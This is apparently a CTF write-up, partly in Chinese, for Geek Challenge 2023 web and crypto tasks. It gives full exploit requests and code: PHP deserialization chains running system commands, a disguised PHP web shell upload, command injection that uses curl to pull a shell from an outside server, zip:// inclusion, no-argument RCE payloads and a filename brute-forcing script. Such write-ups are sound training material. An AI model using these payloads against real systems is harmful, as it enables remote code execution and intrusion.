web
ezhttp
easy_php
POST /?syc=welcome%20to%20GEEK%202023!&lover=2e4 HTTP/2
Host: sdjmytlkvr9c2362p1nccahfa.node.game.sycsec.com
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1320
qw=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&yxx=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&SYC[GEEK.2023=Happy to see you!
unsign
<?php
class syc
{
public $cuit;
public function __destruct()
{
echo("action!<br>");
$function=$this->cuit;
return $function();
}
}
class lover
{
public $yxx;
public $QW;
public function __invoke()
{
echo("invoke!<br>");
return $this->yxx->QW;
}
}
class web
{
public $eva1;
public $interesting;
public function __get($var)
{
echo("get!<br>");
$eva1=$this->eva1;
$eva1($this->interesting);
}
}
$re=new syc();
$re->cuit=new lover();
$re->cuit->yxx=new web();
$re->cuit->yxx->eva1='system';
$re->cuit->yxx->interesting='cat /flag';
echo serialize($re);
url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"cat /flag";}s:2:"QW";N;}}
n00b_Upload
POST /upload_file.php HTTP/2
Host: cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Length: 315
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqmJNVHRgdkJ76BDI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg
GIF89a
<?=eval($_POST['cmd']);?>
------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundaryqmJNVHRgdkJ76BDI--
curl
服务器上准备一个一句话马,然后开一个http服务,因为不能有冒号,所以开80端口
GIF89a
<?=eval($_POST['cmd']);?>
使用curl命令下载到环境里,另存为1.php
addr=-o 1.php xx.xxx.xxx.xxx/shell.php
然后访问
https://qbwtun5kbud0kg20s9fbp7p4f.node.game.sycsec.com/1.php
cmd=system('cat /tmp/Syclover');
famale_imp_l0ve
一道文件包含,用到了zip协议,主要是题目限制了包含文件的后缀时使用
<?php
//o2takuXX师傅说有问题,忘看了。
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file) && strtolower(substr($file, -4)) == ".jpg"){
include($file);
}
?>
准备一个压缩包,压缩包的内容是一个cmd.jpg文件,然后文件内容是一句话马,然后压缩成zip文件
然后通过网站上传之后,用zip协议进行文件包含
https://w0co1yvttngpnhutm4avlaczb.node.game.sycsec.com/include.php?file=zip://upload/1cmd.jpg.zip%23cmd.jpg
Pupyy_rce
<?php
highlight_file(__FILE__);
header('Content-Type: text/html; charset=utf-8');
error_reporting(0);
include(flag.php);
//当前目录下有好康的😋
if (isset($_GET['var']) && $_GET['var']) {
$var = $_GET['var'];
if (!preg_match("/env|var|session|header/i", $var,$match)) {
if (';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $var)){
eval($_GET['var']);
}
else die("WAF!!");
} else{
die("PLZ DONT HCAK ME😅");
}
}
这道题考点还是无参数RCE吧
print_r(scandir(getcwd()));获取一下当前路径下的文件
发现flag文件在数组的第四个位置,倒数第五个位置,用数组逆向也不太好操作,又把var和session、header给ban了,看了看对数组的一些操作
array_rand这个函数可以随机返回一个数组的键名
这里已经是得到了flag文件名对应的键了
array_flip这个函数可以交换键值,所以配合array_rand函数就可以获得flag文件名了
这就好说了,直接show_source,试几次就试到了flag文件
payload
show_source(array_rand(array_flip(scandir(getcwd()))));
ez_remove
<?php
highlight_file(__FILE__);
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
if(isset($_GET['web'])){
if(!preg_match('/lover/i',$_GET['web'])){
$a=unserialize($_GET['web']);
throw new Error("快来玩快来玩~");
}
else{
echo("nonono");
}
}
?>
这道题首先用到了GC垃圾回收机制绕过throw new Error,然后是用十六进制绕过对lover的过滤,最后是用蚁剑绕过phpinfo里的disable_function。 先上exp
<?php
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
$a=new syc();
$a->lover="eval(\$_POST[1]);";
$b=array($a,0);
echo serialize($b);
运行得到
a:2:{i:0;O:3:"syc":1:{s:5:"lover";s:16:"eval($_POST[1]);";}i:1;i:0;}
把结尾的i:1;i:0;换成i:0;i:0;导致GC产生,然后用\6c\6f\76\65\72替换lover绕过正则,最后蚁剑连接就好,记得把https换成http,根目录下有一个f1ger文件,base64 f1ger就出来了
Akane!
php的一个反序列化题目
<?php
error_reporting(0);
show_source(__FILE__);
class Hoshino
{
public $Ruby;
private $Aquamarine;
public function __destruct()
{
$this->Ruby->func();
}
}
class Idol
{
public $Akane;
public function __wakeup()
{
$this->Akane = '/var/www/html/The************************.php';
}
public function __call($method,$args)
{
$Kana = count(scandir($this->Akane));
if ($Kana > 0) {
die('Kurokawa Akane');
} else {
die('Arima Kana');
}
}
}
$a = unserialize(base64_decode($_GET['tuizi']));
?>
看了一下,考点一个是wakeup函数的绕过,一个是glob协议爆破文件名,然后scandir函数的返回值是一个数组,利用数组的长度判断字符是否正确 先写一个序列化的demo
<?php
class Hoshino
{
public $Ruby;
public $Aquamarine;
public function __destruct()
{
$this->Ruby->func();
}
}
class Idol
{
public $Akane;
public function __wakeup()
{
$this->Akane = '/var/www/html/The************************.php';
}
public function __call($method,$args)
{
$Kana = count(scandir($this->Akane));
if ($Kana > 0) {
die('Kurokawa Akane');
} else {
die('Arima Kana');
}
}
}
$a = new Hoshino();
$a->Ruby=new Idol();
$a->Ruby->Akane='glob:///var/www/html/';
$a2=serialize($a);
$b=str_replace(":2:",":3:",$a2);
echo($b)."\n";
echo base64_encode($b);
//O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:21:"glob:///var/www/html/";}s:10:"Aquamarine";N;}
//Tzo3OiJIb3NoaW5vIjozOntzOjQ6IlJ1YnkiO086NDoiSWRvbCI6MTp7czo1OiJBa2FuZSI7czoyMToiZ2xvYjovLy92YXIvd3d3L2h0bWwvIjt9czoxMDoiQXF1YW1hcmluZSI7Tjt9
得到字符串后用python写脚本
import requests
import string
import base64
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789."
filename = "The"
url = "https://b5q90mpuhbnc7n6u7k0g73glp.node.game.sycsec.com/"
for num in range(1,50):
for i in s:
print(num)
print(i)
payload = 'O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:'+str(25+num)+':"glob:///var/www/html/'+filename+i+'*";}s:10:"Aquamarine";N;}'
print(payload)
parm='?tuizi='+base64.b64encode(payload.encode('utf-8')).decode('utf-8')
print(parm)
r = requests.get(url=url+parm)
if "Kurokawa Akane" in r.text:
filename += i
print(num, filename)
break
这样直接运行就可以爆破出文件名,我这里直接循环次数写的50,懒得数题目里的*号了,爆破结果在过程中能看到
文件名:TheS4crEtF1AgFi1EByo2takuXX.php
得到flag
SYC{QW410zJgUiSg9oclaL}
crypto
week1
proof_of_work
import hashlib
s='mjpIZCsijFpQtaSv'
m = '6c327a60bb4beeea04b037e2c6ec50201be9a9c15351040dae09369717c18263'
def revmd5():
for i in range(33,127):
for j in range(33, 127):
for k in range(33, 127):
for l in range(33,127):
a =chr(i)+chr(j)+chr(k)+chr(l)+s
ha = hashlib.sha256(a.encode()).hexdigest()
# print(ha)
# print(a)
if (ha == m):
print(a)
print(ha)
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
break;
revmd5()